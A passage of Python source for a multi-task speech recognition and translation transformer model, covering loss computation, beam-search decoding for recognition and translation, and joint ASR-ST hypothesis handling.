ys_in_pad_src, ys_out_pad_src = add_sos_eos(ys_pad_src, self.sos_src, self.eos_src,
self.ignore_id) # bs x max_lens_src
if self.lang_tok == "decoder-pre" and self.lang_tok_mt != "pre-tgt": # _v2 for mt_model_tgt
ys_in_pad_src = torch.cat([tgt_lang_ids_src, ys_in_pad_src[:, 1:]], dim=1)
ys_mask_src = target_mask(ys_in_pad_src, self.ignore_id) # bs x max_lens_src x max_lens_src
if self.do_mt and not self.do_st:
ys_pad_src_mt = ys_in_pad_src[:, :max(ilens)] # for data parallel
ys_mask_src_mt = (~make_pad_mask(ilens.tolist())).to(ys_pad_src_mt.device).unsqueeze(-2)
# 1. forward encoder
if self.do_st or self.do_asr:
xs_pad = xs_pad[:, :max(ilens)] # for data parallel # bs x max_ilens x idim
if self.lang_tok == "encoder-pre-sum":
lang_embed = self.language_embeddings(tgt_lang_ids) # bs x 1 x idim
xs_pad = xs_pad + lang_embed
src_mask = (~make_pad_mask(ilens.tolist())).to(xs_pad.device).unsqueeze(-2) # bs x 1 x max_ilens
enc_lang_id, enc_lang_id_src = None, None
if self.use_adapters_in_enc:
if self.do_asr:
enc_lang_id_src = str(tgt_lang_ids_src[0].data.cpu().numpy()[0])
if self.do_st:
enc_lang_id = str(tgt_lang_ids[0].data.cpu().numpy()[0])
# forward pass
hs_pad, hs_mask = self.encoder(xs_pad, src_mask, enc_lang_id)
hs_pad_src, hs_mask_src = hs_pad, hs_mask
if self.use_adapters_in_enc and self.do_asr:
hs_pad_src, hs_mask_src = self.encoder(xs_pad, src_mask, enc_lang_id_src)
elif self.do_mt and not self.do_st:
hs_pad_mt, hs_mask_mt = self.encoder_mt(ys_pad_src_mt, ys_mask_src_mt)
else:
raise NotImplementedError
# 2. forward decoders
pred_pad, pred_pad_asr, pred_pad_mt = None, None, None
loss_att, loss_asr, loss_mt = 0.0, 0.0, 0.0
if self.do_st:
if self.cross_to_st:
if self.wait_k_asr > 0:
cross_mask = create_cross_mask(ys_in_pad, ys_in_pad_src,
self.ignore_id, wait_k_cross=self.wait_k_asr)
elif self.wait_k_st > 0:
cross_mask = create_cross_mask(ys_in_pad, ys_in_pad_src,
self.ignore_id, wait_k_cross=-self.wait_k_st)
else:
cross_mask = create_cross_mask(ys_in_pad, ys_in_pad_src,
self.ignore_id, wait_k_cross=0)
cross_input = self.decoder_asr.embed(ys_in_pad_src)
if (self.cross_src_from == "before-self" and self.cross_src) or \
(self.cross_self_from == "before-self" and self.cross_self):
cross_input = self.decoder_asr.decoders[0].norm1(cross_input)
pred_pad, pred_mask = self.decoder(ys_in_pad, ys_mask, hs_pad, hs_mask,
cross=cross_input, cross_mask=cross_mask,
cross_self=self.cross_self, cross_src=self.cross_src)
else:
pred_pad, pred_mask = self.decoder(ys_in_pad, ys_mask, hs_pad, hs_mask)
if not self.use_joint_dict and (self.do_st and self.do_asr):
pred_pad = self.output_layer(pred_pad)
self.pred_pad = pred_pad
# compute attention loss
loss_att = self.criterion_st(pred_pad, ys_out_pad)
# Multi-task w/ ASR
if self.do_asr:
if self.cross_to_asr:
if self.wait_k_asr > 0:
cross_mask = create_cross_mask(ys_in_pad_src, ys_in_pad,
self.ignore_id, wait_k_cross=-self.wait_k_asr)
elif self.wait_k_st > 0:
cross_mask = create_cross_mask(ys_in_pad_src, ys_in_pad,
self.ignore_id, wait_k_cross=self.wait_k_st)
else:
cross_mask = create_cross_mask(ys_in_pad_src, ys_in_pad,
self.ignore_id, wait_k_cross=0)
cross_input = self.decoder.embed(ys_in_pad)
if (self.cross_src_from == "before-self" and self.cross_src) or \
(self.cross_self_from == "before-self" and self.cross_self):
cross_input = self.decoder.decoders[0].norm1(cross_input)
pred_pad_asr, _ = self.decoder_asr(ys_in_pad_src, ys_mask_src, hs_pad_src, hs_mask_src,
cross=cross_input, cross_mask=cross_mask,
cross_self=self.cross_self, cross_src=self.cross_src)
else:
pred_pad_asr, _ = self.decoder_asr(ys_in_pad_src, ys_mask_src, hs_pad_src, hs_mask_src)
if not self.use_joint_dict and (self.do_st and self.do_asr):
pred_pad_asr = self.output_layer_asr(pred_pad_asr)
self.pred_pad_asr = pred_pad_asr
# compute loss
loss_asr = self.criterion_asr(pred_pad_asr, ys_out_pad_src)
# Multi-task w/ MT
if self.do_mt:
if self.do_st:
# forward MT encoder
ilens_mt = torch.sum(ys_pad_src != self.ignore_id, dim=1).cpu().numpy()
# NOTE: ys_pad_src is padded with -1
ys_src = [y[y != self.ignore_id] for y in ys_pad_src] # parse padded ys_src
ys_zero_pad_src = pad_list(ys_src, self.pad) # re-pad with zero
ys_zero_pad_src = ys_zero_pad_src[:, :max(ilens_mt)] # for data parallel
src_mask_mt = (~make_pad_mask(ilens_mt.tolist())).to(ys_zero_pad_src.device).unsqueeze(-2)
hs_pad_mt, hs_mask_mt = self.encoder_mt(ys_zero_pad_src, src_mask_mt)
# forward MT decoder
pred_pad_mt, _ = self.decoder(ys_in_pad, ys_mask, hs_pad_mt, hs_mask_mt)
# compute loss
loss_mt = self.criterion_st(pred_pad_mt, ys_out_pad)
else:
pred_pad_mt, pred_mask_mt = self.decoder_mt(ys_in_pad, ys_mask, hs_pad_mt, hs_mask_mt)
loss_mt = self.criterion_mt(pred_pad_mt, ys_out_pad)
# compute accuracy
self.acc = th_accuracy(pred_pad.view(-1, self.odim_tgt), ys_out_pad,
ignore_label=self.ignore_id) if pred_pad is not None else 0.0
self.acc_asr = th_accuracy(pred_pad_asr.view(-1, self.odim_src), ys_out_pad_src,
ignore_label=self.ignore_id) if pred_pad_asr is not None else 0.0
self.acc_mt = th_accuracy(pred_pad_mt.view(-1, self.odim_tgt), ys_out_pad,
ignore_label=self.ignore_id) if pred_pad_mt is not None else 0.0
# TODO(karita) show predicted text
# TODO(karita) calculate these stats
cer_ctc = None
if self.mtlalpha == 0.0 or self.asr_weight == 0:
loss_ctc = 0.0
else:
batch_size = xs_pad.size(0)
hs_len = hs_mask.view(batch_size, -1).sum(1)
loss_ctc = self.ctc(hs_pad.view(batch_size, -1, self.adim), hs_len, ys_pad_src)
if self.error_calculator is not None:
ys_hat = self.ctc.argmax(hs_pad.view(batch_size, -1, self.adim)).data
cer_ctc = self.error_calculator(ys_hat.cpu(), ys_pad_src.cpu(), is_ctc=True)
# 5. compute cer/wer
cer, wer = None, None # TODO(hirofumi0810): fix later
# if self.training or (self.asr_weight == 0 or self.mtlalpha == 1 or not (self.report_cer or self.report_wer)):
# cer, wer = None, None
# else:
# ys_hat = pred_pad.argmax(dim=-1)
# cer, wer = self.error_calculator(ys_hat.cpu(), ys_pad.cpu())
# copyied from e2e_asr
alpha = self.mtlalpha
self.loss = (1 - self.asr_weight - self.mt_weight) * loss_att + \
self.asr_weight * (alpha * loss_ctc + (1 - alpha) * loss_asr) + \
self.mt_weight * loss_mt
loss_asr_data = float(alpha * loss_ctc + (1 - alpha) * loss_asr)
loss_mt_data = None if self.mt_weight == 0 else float(loss_mt)
loss_st_data = float(loss_att)
loss_data = float(self.loss)
# compute bleu and ppl for mt model
if self.do_mt:
bleu = 0.0
if self.training or self.error_calculator is None:
bleu = 0.0
else:
ys_hat_mt = pred_pad_mt.argmax(dim=-1)
bleu = self.error_calculator(ys_hat_mt.cpu(), ys_out_pad.cpu())
if self.normalize_length:
self.ppl = np.exp(loss_data)
else:
ys_out_pad = ys_out_pad.view(-1)
ignore = ys_out_pad == self.ignore_id # (B,)
total = len(ys_out_pad) - ignore.sum().item()
self.ppl = np.exp(loss_data * ys_out_pad.size(0) / total)
if loss_data < CTC_LOSS_THRESHOLD and not math.isnan(loss_data):
if self.do_mt:
self.reporter.report(loss_data, self.acc_mt, self.ppl, bleu)
else:
self.reporter.report(loss_asr_data, loss_mt_data, loss_st_data,
self.acc_asr, self.acc_mt, self.acc,
cer_ctc, cer, wer, 0.0, # TODO(hirofumi0810): bleu
loss_data)
else:
logging.warning('loss (=%f) is not correct', loss_data)
return self.loss
def scorers(self):
"""Scorers."""
return dict(decoder=self.decoder)
def encode(self, x):
"""Encode source acoustic features.
:param ndarray x: source acoustic feature (T, D)
:return: encoder outputs
:rtype: torch.Tensor
"""
self.eval()
x = torch.as_tensor(x).unsqueeze(0)
if self.do_mt:
enc_output, _ = self.encoder_mt(x, None)
else:
enc_output, _ = self.encoder(x, None)
return enc_output.squeeze(0)
def recognize(self, x, recog_args, char_list=None, rnnlm=None, use_jit=False):
"""Recognize input speech.
:param ndnarray x: input acoustic feature (B, T, D) or (T, D)
:param Namespace recog_args: argment Namespace contraining options
:param list char_list: list of characters
:param torch.nn.Module rnnlm: language model module
:return: N-best decoding results
:rtype: list
"""
enc_output = self.encode(x).unsqueeze(0)
if recog_args.ctc_weight > 0.0:
lpz = self.ctc.log_softmax(enc_output)
lpz = lpz.squeeze(0)
else:
lpz = None
h = enc_output.squeeze(0)
logging.info('input lengths: ' + str(h.size(0)))
# search parms
beam = recog_args.beam_size_asr
penalty = recog_args.penalty_asr
ctc_weight = recog_args.ctc_weight
# preprare sos
y = self.sos_src
if self.use_lid and self.lang_tok == 'decoder-pre':
src_lang_id = '<2{}>'.format(recog_args.config.split('.')[-2].split('-')[0])
y = char_list.index(src_lang_id)
logging.info(f'src_lang_id: {src_lang_id} - y: {y}')
logging.info(f'y: {y}')
vy = h.new_zeros(1).long()
if recog_args.maxlenratio_asr == 0:
maxlen = h.shape[0]
else:
maxlen = max(1, int(recog_args.maxlenratio_asr * h.size(0)))
minlen = int(recog_args.minlenratio_asr * h.size(0))
logging.info('max output length: ' + str(maxlen))
logging.info('min output length: ' + str(minlen))
# initialize hypothesis
if rnnlm:
hyp = {'score': 0.0, 'yseq': [y], 'rnnlm_prev': None}
else:
hyp = {'score': 0.0, 'yseq': [y]}
if lpz is not None:
import numpy
from espnet.nets.ctc_prefix_score import CTCPrefixScore
ctc_prefix_score = CTCPrefixScore(lpz.detach().numpy(), 0, self.eos_src, numpy)
hyp['ctc_state_prev'] = ctc_prefix_score.initial_state()
hyp['ctc_score_prev'] = 0.0
if ctc_weight != 1.0:
# pre-pruning based on attention scores
from espnet.nets.pytorch_backend.rnn.decoders import CTC_SCORING_RATIO
ctc_beam = min(lpz.shape[-1], int(beam * CTC_SCORING_RATIO))
else:
ctc_beam = lpz.shape[-1]
hyps = [hyp]
ended_hyps = []
traced_decoder = None
for i in six.moves.range(maxlen):
logging.debug('position ' + str(i))
hyps_best_kept = []
for hyp in hyps:
vy[0] = hyp['yseq'][i]
# get nbest local scores and their ids
ys_mask = subsequent_mask(i + 1).unsqueeze(0)
ys = torch.tensor(hyp['yseq']).unsqueeze(0)
# FIXME: jit does not match non-jit result
if use_jit:
if traced_decoder is None:
traced_decoder = torch.jit.trace(self.decoder.forward_one_step,
(ys, ys_mask, enc_output))
local_att_scores = traced_decoder(ys, ys_mask, enc_output)[0]
else:
local_att_scores = self.decoder_asr.forward_one_step(ys, ys_mask, enc_output)[0]
if not self.use_joint_dict and (self.do_st and self.do_asr):
local_att_scores = self.output_layer_asr(local_att_scores)
if rnnlm:
rnnlm_state, local_lm_scores = rnnlm.predict(hyp['rnnlm_prev'], vy)
local_scores = local_att_scores + recog_args.lm_weight * local_lm_scores
else:
local_scores = local_att_scores
if lpz is not None:
local_best_scores, local_best_ids = torch.topk(
local_att_scores, ctc_beam, dim=1)
ctc_scores, ctc_states = ctc_prefix_score(
hyp['yseq'], local_best_ids[0], hyp['ctc_state_prev'])
local_scores = \
(1.0 - ctc_weight) * local_att_scores[:, local_best_ids[0]] \
+ ctc_weight * torch.from_numpy(ctc_scores - hyp['ctc_score_prev'])
if rnnlm:
local_scores += recog_args.lm_weight * local_lm_scores[:, local_best_ids[0]]
local_best_scores, joint_best_ids = torch.topk(local_scores, beam, dim=1)
local_best_ids = local_best_ids[:, joint_best_ids[0]]
else:
local_best_scores, local_best_ids = torch.topk(local_scores, beam, dim=1)
for j in six.moves.range(beam):
new_hyp = {}
new_hyp['score'] = hyp['score'] + float(local_best_scores[0, j])
new_hyp['yseq'] = [0] * (1 + len(hyp['yseq']))
new_hyp['yseq'][:len(hyp['yseq'])] = hyp['yseq']
new_hyp['yseq'][len(hyp['yseq'])] = int(local_best_ids[0, j])
if rnnlm:
new_hyp['rnnlm_prev'] = rnnlm_state
if lpz is not None:
new_hyp['ctc_state_prev'] = ctc_states[joint_best_ids[0, j]]
new_hyp['ctc_score_prev'] = ctc_scores[joint_best_ids[0, j]]
# will be (2 x beam) hyps at most
hyps_best_kept.append(new_hyp)
hyps_best_kept = sorted(
hyps_best_kept, key=lambda x: x['score'], reverse=True)[:beam]
# sort and get nbest
hyps = hyps_best_kept
logging.debug('number of pruned hypothes: ' + str(len(hyps)))
if char_list is not None:
logging.debug(
'best hypo: ' + ''.join([char_list[int(x)] for x in hyps[0]['yseq'][1:]]))
# add eos in the final loop to avoid that there are no ended hyps
if i == maxlen - 1:
logging.info('adding <eos> in the last postion in the loop')
for hyp in hyps:
hyp['yseq'].append(self.eos_src)
# add ended hypothes to a final list, and removed them from current hypothes
# (this will be a probmlem, number of hyps < beam)
remained_hyps = []
for hyp in hyps:
if hyp['yseq'][-1] == self.eos_src:
# only store the sequence that has more than minlen outputs
# also add penalty
if len(hyp['yseq']) > minlen:
hyp['score'] += (i + 1) * penalty
if rnnlm: # Word LM needs to add final <eos> score
hyp['score'] += recog_args.lm_weight * rnnlm.final(
hyp['rnnlm_prev'])
ended_hyps.append(hyp)
else:
remained_hyps.append(hyp)
# end detection
if end_detect(ended_hyps, i) and recog_args.maxlenratio == 0.0:
logging.info('end detected at %d', i)
break
hyps = remained_hyps
logging.debug(f'hyps remained: {hyps}')
if len(hyps) > 0:
logging.info('remained hypothes: ' + str(len(hyps)))
else:
logging.info('no hypothesis. Finish decoding.')
break
if char_list is not None:
for hyp in hyps:
logging.info(
'hypo: ' + ''.join([char_list[int(x)] for x in hyp['yseq'][1:]]))
logging.info('number of ended hypothes: ' + str(len(ended_hyps)))
nbest_hyps = sorted(
ended_hyps, key=lambda x: x['score'], reverse=True)[:min(len(ended_hyps), recog_args.nbest)]
# check number of hypotheis
if len(nbest_hyps) == 0:
logging.warning('there is no N-best results, perform recognition again with smaller minlenratio.')
# should copy becasuse Namespace will be overwritten globally
recog_args = Namespace(**vars(recog_args))
recog_args.minlenratio = max(0.0, recog_args.minlenratio - 0.1)
return self.recognize(x, recog_args, char_list, rnnlm)
logging.info('total log probability: ' + str(nbest_hyps[0]['score']))
logging.info('normalized log probability: ' + str(nbest_hyps[0]['score'] / len(nbest_hyps[0]['yseq'])))
return nbest_hyps
def translate(self, x, trans_args, char_list=None, rnnlm=None, use_jit=False):
"""Translate input speech.
:param ndnarray x: input acoustic feature (B, T, D) or (T, D)
:param Namespace trans_args: argment Namespace contraining options
:param list char_list: list of characters
:param torch.nn.Module rnnlm: language model module
:return: N-best decoding results
:rtype: list
"""
# preprate sos
if getattr(trans_args, "tgt_lang", False):
if self.replace_sos:
y = char_list.index(trans_args.tgt_lang)
else:
y = self.sos_tgt
if self.use_lid and self.lang_tok == 'decoder-pre':
if self.lang_tok_mt is None or self.lang_tok_mt == "pre-tgt":
tgt_lang_id = '<2{}>'.format(trans_args.config.split('.')[-2].split('-')[-1])
src_lang_id = self.sos_src
y = char_list.index(tgt_lang_id)
elif self.lang_tok_mt == "pre-src":
tgt_lang_id = self.sos_tgt
src_lang_id = '<2{}>'.format(trans_args.config.split('.')[-2].split('-')[-1])
if self.do_mt:
if src_lang_id != self.sos_src:
src_lang_id = char_list.index(src_lang_id)
x[0].insert(0, src_lang_id)
logging.info(f'tgt_lang_id: {tgt_lang_id} - y: {y}')
logging.info(f'src_lang_id: {src_lang_id}')
logging.info('<sos> index: ' + str(y))
logging.info('<sos> mark: ' + char_list[y])
if self.do_mt:
x = to_device(self, torch.from_numpy(np.fromiter(map(int, x[0]), dtype=np.int64)))
xs_pad = x.unsqueeze(0)
enc_output = self.encode(x).unsqueeze(0)
h = enc_output.squeeze(0)
logging.info('input lengths: ' + str(h.size(0)))
# search parms
beam = trans_args.beam_size
penalty = trans_args.penalty
vy = h.new_zeros(1).long()
if trans_args.maxlenratio == 0:
maxlen = h.shape[0]
else:
# maxlen >= 1
maxlen = max(1, int(trans_args.maxlenratio * h.size(0)))
minlen = int(trans_args.minlenratio * h.size(0))
logging.info('max output length: ' + str(maxlen))
logging.info('min output length: ' + str(minlen))
# initialize hypothesis
if rnnlm:
hyp = {'score': 0.0, 'yseq': [y], 'rnnlm_prev': None}
else:
hyp = {'score': 0.0, 'yseq': [y]}
hyps = [hyp]
ended_hyps = []
traced_decoder = None
for i in six.moves.range(maxlen):
logging.debug('position ' + str(i))
hyps_best_kept = []
for hyp in hyps:
vy[0] = hyp['yseq'][i]
# get nbest local scores and their ids
ys_mask = subsequent_mask(i + 1).unsqueeze(0)
ys = torch.tensor(hyp['yseq']).unsqueeze(0)
# FIXME: jit does not match non-jit result
if use_jit:
if traced_decoder is None:
traced_decoder = torch.jit.trace(self.decoder.forward_one_step,
(ys, ys_mask, enc_output))
local_att_scores = traced_decoder(ys, ys_mask, enc_output)[0]
else:
if self.do_mt:
local_att_scores = self.decoder_mt.forward_one_step(ys, ys_mask, enc_output)[0]
else:
local_att_scores = self.decoder.forward_one_step(ys, ys_mask, enc_output)[0]
if not self.use_joint_dict and (self.do_st and self.do_asr):
local_att_scores = self.output_layer(local_att_scores)
if rnnlm:
rnnlm_state, local_lm_scores = rnnlm.predict(hyp['rnnlm_prev'], vy)
local_scores = local_att_scores + trans_args.lm_weight * local_lm_scores
else:
local_scores = local_att_scores
local_best_scores, local_best_ids = torch.topk(local_scores, beam, dim=1)
for j in six.moves.range(beam):
new_hyp = {}
new_hyp['score'] = hyp['score'] + float(local_best_scores[0, j])
new_hyp['yseq'] = [0] * (1 + len(hyp['yseq']))
new_hyp['yseq'][:len(hyp['yseq'])] = hyp['yseq']
new_hyp['yseq'][len(hyp['yseq'])] = int(local_best_ids[0, j])
if rnnlm:
new_hyp['rnnlm_prev'] = rnnlm_state
# will be (2 x beam) hyps at most
hyps_best_kept.append(new_hyp)
hyps_best_kept = sorted(
hyps_best_kept, key=lambda x: x['score'], reverse=True)[:beam]
# sort and get nbest
hyps = hyps_best_kept
logging.debug('number of pruned hypothes: ' + str(len(hyps)))
if char_list is not None:
logging.info(
'best hypo: ' + ''.join([char_list[int(x)] for x in hyps[0]['yseq'][1:]]))
# add eos in the final loop to avoid that there are no ended hyps
if i == maxlen - 1:
logging.info('adding <eos> in the last postion in the loop')
for hyp in hyps:
hyp['yseq'].append(self.eos_tgt)
# add ended hypothes to a final list, and removed them from current hypothes
# (this will be a probmlem, number of hyps < beam)
remained_hyps = []
for hyp in hyps:
if hyp['yseq'][-1] == self.eos_tgt:
# only store the sequence that has more than minlen outputs
# also add penalty
if len(hyp['yseq']) > minlen:
hyp['score'] += (i + 1) * penalty
if rnnlm: # Word LM needs to add final <eos> score
hyp['score'] += trans_args.lm_weight * rnnlm.final(
hyp['rnnlm_prev'])
ended_hyps.append(hyp)
else:
remained_hyps.append(hyp)
# end detection
if end_detect(ended_hyps, i) and trans_args.maxlenratio == 0.0:
logging.info('end detected at %d', i)
break
hyps = remained_hyps
if len(hyps) > 0:
logging.debug('remeined hypothes: ' + str(len(hyps)))
else:
logging.info('no hypothesis. Finish decoding.')
break
if char_list is not None:
for hyp in hyps:
logging.debug(
'hypo: ' + ''.join([char_list[int(x)] for x in hyp['yseq'][1:]]))
logging.debug('number of ended hypothes: ' + str(len(ended_hyps)))
nbest_hyps = sorted(
ended_hyps, key=lambda x: x['score'], reverse=True)[:min(len(ended_hyps), trans_args.nbest)]
# check number of hypotheis
if len(nbest_hyps) == 0:
logging.warning('there is no N-best results, perform recognition again with smaller minlenratio.')
# should copy becasuse Namespace will be overwritten globally
trans_args = Namespace(**vars(trans_args))
trans_args.minlenratio = max(0.0, trans_args.minlenratio - 0.1)
return self.translate(x, trans_args, char_list, rnnlm)
logging.info('total log probability: ' + str(nbest_hyps[0]['score']))
logging.info('normalized log probability: ' + str(nbest_hyps[0]['score'] / len(nbest_hyps[0]['yseq'])))
return nbest_hyps
def update_hypothesis(self, i, beam, hyps, hyps_cross_candidates,
enc_output, decoder, eos_cross, decoder_cross=None, wait_k_cross=0):
hyps_best_kept = []
# For each ST hypothesis, we use the best ASR candidates as cross information
for hyp in hyps:
# get nbest local scores and their ids
ys_mask = subsequent_mask(i + 1).unsqueeze(0)
ys = torch.tensor(hyp['yseq']).unsqueeze(0)
# FIXME: jit does not match non-jit result
if decoder_cross is not None:
all_scores = []
for hyp_cross in hyps_cross_candidates:
if len(hyp_cross) > 2:
if hyp_cross[-1] == eos_cross and hyp_cross[-2] == eos_cross:
hyp_cross.append(eos_cross)
ys_cross = torch.tensor(hyp_cross['yseq']).unsqueeze(0)
y_cross = decoder_cross.embed(ys_cross)
if (self.cross_self_from == "before-self" and self.cross_self) or \
(self.cross_src_from == "before-self" and self.cross_src):
y_cross = decoder_cross.decoders[0].norm1(y_cross)
cross_mask = create_cross_mask(ys, ys_cross, self.ignore_id, wait_k_cross=wait_k_cross)
local_att_scores = decoder.forward_one_step(ys, ys_mask, enc_output,
cross=y_cross, cross_mask=cross_mask,
cross_self=self.cross_self, cross_src=self.cross_src)[0]
V = local_att_scores.shape[-1]
all_scores.append(local_att_scores)
local_scores = torch.cat(all_scores, dim=-1)
local_best_scores, local_best_ids = torch.topk(local_scores, beam, dim=1)
local_best_ids = local_best_ids % V
else:
local_scores = decoder.forward_one_step(ys, ys_mask, enc_output)[0]
local_best_scores, local_best_ids = torch.topk(local_scores, beam, dim=1)
for j in six.moves.range(beam):
new_hyp = {}
new_hyp['score'] = hyp['score'] + float(local_best_scores[0, j])
new_hyp['yseq'] = [0] * (1 + len(hyp['yseq']))
new_hyp['yseq'][:len(hyp['yseq'])] = hyp['yseq']
new_hyp['yseq'][len(hyp['yseq'])] = int(local_best_ids[0, j])
# will be (2 x beam) hyps at most
hyps_best_kept.append(new_hyp)
hyps_best_kept = sorted(
hyps_best_kept, key=lambda x: x['score'], reverse=True)[:beam]
return hyps_best_kept
def process_hypothesis(self, i, hyps, ended_hyps, maxlen, minlen, trans_args, eos, rnnlm=None):
stop_decoding = False
# add eos in the final loop to avoid that there are no ended hyps
if i == maxlen - 1:
logging.info('adding <eos> in the last postion in the loop')
for hyp in hyps:
hyp['yseq'].append(eos)
# add ended hypothes to a final list, and removed them from current hypothes
# (this will be a probmlem, number of hyps < beam)
remained_hyps = []
for hyp in hyps:
if hyp['yseq'][-1] == eos:
# only store the sequence that has more than minlen outputs
# also add penalty
if len(hyp['yseq']) > minlen:
hyp['score'] += (i + 1) * trans_args.penalty
if rnnlm: # Word LM needs to add final <eos> score
hyp['score'] += trans_args.lm_weight * rnnlm.final(
hyp['rnnlm_prev'])
ended_hyps.append(hyp)
else:
remained_hyps.append(hyp)
# end detection
if end_detect(ended_hyps, i) and trans_args.maxlenratio == 0.0:
logging.info('end detected at %d', i)
stop_decoding = True
hyps = remained_hyps
if len(hyps) > 0:
logging.debug('remained hypothes: ' + str(len(hyps)))
else:
logging.info('no hypothesis. Finish decoding.')
stop_decoding = True
return hyps, ended_hyps, stop_decoding
def recognize_and_translate_separate(self, x, trans_args,
char_list_tgt=None,
char_list_src=None,
rnnlm=None,
use_jit=False):
"""Translate input speech.
:param ndnarray x: input acoustic feature (B, T, D) or (T, D)
:param Namespace trans_args: argment Namespace contraining options
:param list char_list_tgt: list of characters for target languages
:param list char_list_src: list of characters for source languages
:param torch.nn.Module rnnlm: language model module
:return: N-best decoding results
:rtype: list
"""
# preprate sos
if getattr(trans_args, "tgt_lang", False):
if self.replace_sos:
y = char_list_tgt.index(trans_args.tgt_lang)
else:
y = self.sos_tgt
if self.one_to_many and self.lang_tok == 'decoder-pre':
tgt_lang_id = '<2{}>'.format(trans_args.config.split('.')[-2].split('-')[-1])
y = char_list_tgt.index(tgt_lang_id)
logging.info(f'tgt_lang_id: {tgt_lang_id} - y: {y}')
src_lang_id = '<2{}>'.format(trans_args.config.split('.')[-2].split('-')[0])
y_asr = char_list_src.index(src_lang_id)
logging.info(f'src_lang_id: {src_lang_id} - y_asr: {y_asr}')
else:
y = self.sos_tgt
y_asr = self.sos_src
logging.info(f'<sos> index: {str(y)}; <sos> mark: {char_list_tgt[y]}')
logging.info(f'<sos> index asr: {str(y_asr)}; <sos> mark asr: {char_list_src[y_asr]}')
enc_output = self.encode(x).unsqueeze(0)
h = enc_output.squeeze(0)
logging.info('input lengths: ' + str(h.size(0)))
# search parms
beam = trans_args.beam_size
beam_cross = trans_args.beam_cross_size
penalty = trans_args.penalty
assert beam_cross <= beam
if trans_args.maxlenratio == 0:
maxlen = h.shape[0]
else:
maxlen = max(1, int(trans_args.maxlenratio * h.size(0)))
if trans_args.maxlenratio_asr == 0:
maxlen_asr = h.shape[0]
else:
maxlen_asr = max(1, int(trans_args.maxlenratio_asr * h.size(0)))
minlen = int(trans_args.minlenratio * h.size(0))
minlen_asr = int(trans_args.minlenratio_asr * h.size(0))
logging.info(f'max output length: {str(maxlen)}; min output length: {str(minlen)}')
logging.info(f'max output length asr: {str(maxlen_asr)}; min output length asr: {str(minlen_asr)}')
# initialize hypothesis
if rnnlm:
hyp = {'score': 0.0, 'yseq': [y], 'rnnlm_prev': None}
else:
hyp = {'score': 0.0, 'yseq': [y]}
hyp_asr = {'score': 0.0, 'yseq': [y_asr]}
hyps = [hyp]
hyps_asr = [hyp_asr]
ended_hyps = []
ended_hyps_asr = []
stop_decoding_st = False
stop_decoding_asr = False
hyps_st_candidates = hyps
hyps_asr_candidates = hyps_asr
traced_decoder = None
for i in six.moves.range(maxlen + self.wait_k_asr):
logging.info('position ' + str(i))
# Start ASR first, then after self.wait_k_asr steps, start ST
# ASR SEARCH
if i < maxlen and not stop_decoding_asr:
decoder_cross = self.decoder if self.cross_to_asr else None
hyps_asr = self.update_hypothesis(i, beam,
hyps_asr,
hyps_st_candidates,
enc_output,
self.eos_tgt,
decoder=self.decoder_asr,
decoder_cross=decoder_cross,
wait_k_cross=self.wait_k_st
)
hyps_asr, ended_hyps_asr, stop_decoding_asr = self.process_hypothesis(i,
hyps_asr,
ended_hyps_asr,
maxlen_asr,
minlen_asr,
trans_args,
self.eos_src,
rnnlm=rnnlm
)
hyps_asr_candidates = sorted(hyps_asr + ended_hyps_asr,
key=lambda x: x['score'], reverse=True)[:beam_cross]
if char_list_src is not None:
for hyp in hyps_asr:
logging.info('hypo asr: ' + ''.join([char_list_src[int(x)] for x in hyp['yseq']]))
# ST SEARCH
if i >= self.wait_k_asr and not stop_decoding_st:
decoder_cross = self.decoder_asr if self.cross_to_st else None
hyps = self.update_hypothesis(i - self.wait_k_asr, beam,
hyps, hyps_asr_candidates,
enc_output,
self.eos_src,
decoder=self.decoder,
decoder_cross=decoder_cross,
wait_k_cross=self.wait_k_asr
)
hyps, ended_hyps, stop_decoding_st = self.process_hypothesis(i - self.wait_k_asr,
hyps, ended_hyps,
maxlen, minlen,
trans_args,
self.eos_tgt,
rnnlm=rnnlm
)
hyps_st_candidates = sorted(hyps + ended_hyps,
key=lambda x: x['score'], reverse=True)[:beam_cross]
if char_list_tgt is not None:
for hyp in hyps:
logging.info('hypo: ' + ''.join([char_list_tgt[int(x)] for x in hyp['yseq']]))
# Stop decoding check
if stop_decoding_asr and stop_decoding_st:
break
nbest_hyps = sorted(
ended_hyps, key=lambda x: x['score'], reverse=True)[:min(len(ended_hyps), trans_args.nbest)]
logging.info('best hypo: ' + ''.join([char_list_tgt[int(x)] for x in nbest_hyps[0]['yseq']]))
nbest_hyps_asr = sorted(
ended_hyps_asr, key=lambda x: x['score'], reverse=True)[:min(len(ended_hyps_asr), trans_args.nbest)]
logging.info('best hypo asr: ' + ''.join([char_list_src[int(x)] for x in nbest_hyps_asr[0]['yseq']]))
# check number of hypotheis
if len(nbest_hyps) == 0 or len(nbest_hyps_asr) == 0:
logging.warning('there is no N-best results, perform recognition again with smaller minlenratio.')
# should copy because Namespace will be overwritten globally
trans_args = Namespace(**vars(trans_args))
trans_args.minlenratio = max(0.0, trans_args.minlenratio - 0.1)
return self.recognize_and_translate(x, trans_args, char_list_tgt, char_list_src, rnnlm, use_jit)
logging.info('total log probability: ' + str(nbest_hyps[0]['score']))
logging.info('normalized log probability: ' + str(nbest_hyps[0]['score'] / len(nbest_hyps[0]['yseq'])))
return nbest_hyps, nbest_hyps_asr
def recognize_and_translate_sum(self, x, trans_args,
char_list_tgt=None,
char_list_src=None,
rnnlm=None,
use_jit=False,
decode_asr_weight=1.0,
score_is_prob=False,
ratio_diverse_st=0.0,
ratio_diverse_asr=0.0,
use_rev_triu_width=0,
use_diag=False,
debug=False):
"""Recognize and translate input speech.
:param ndnarray x: input acoustic feature (B, T, D) or (T, D)
:param Namespace trans_args: argment Namespace contraining options
:param list char_list: list of characters
:param torch.nn.Module rnnlm: language model module
:return: N-best decoding results
:rtype: list
"""
assert self.do_asr, "Recognize and translate are performed simultaneously."
self.wait_k_asr = max(self.wait_k_asr, getattr(trans_args, "wait_k_asr", 0))
self.wait_k_st = max(self.wait_k_st, getattr(trans_args, "wait_k_st", 0))
logging.info(f'| ratio_diverse_st = {ratio_diverse_st}')
logging.info(f'| ratio_diverse_asr = {ratio_diverse_asr}')
logging.info(f'| wait_k_asr = {self.wait_k_asr}')
logging.info(f'| wait_k_st = {self.wait_k_st}')
# prepare sos
if getattr(trans_args, "tgt_lang", False):
if self.replace_sos:
y = char_list_tgt.index(trans_args.tgt_lang)
else:
y = self.sos_tgt
if self.use_lid and self.lang_tok == 'decoder-pre':
tgt_lang_id = '<2{}>'.format(trans_args.config.split('.')[-2].split('-')[-1])
y = char_list_tgt.index(tgt_lang_id)
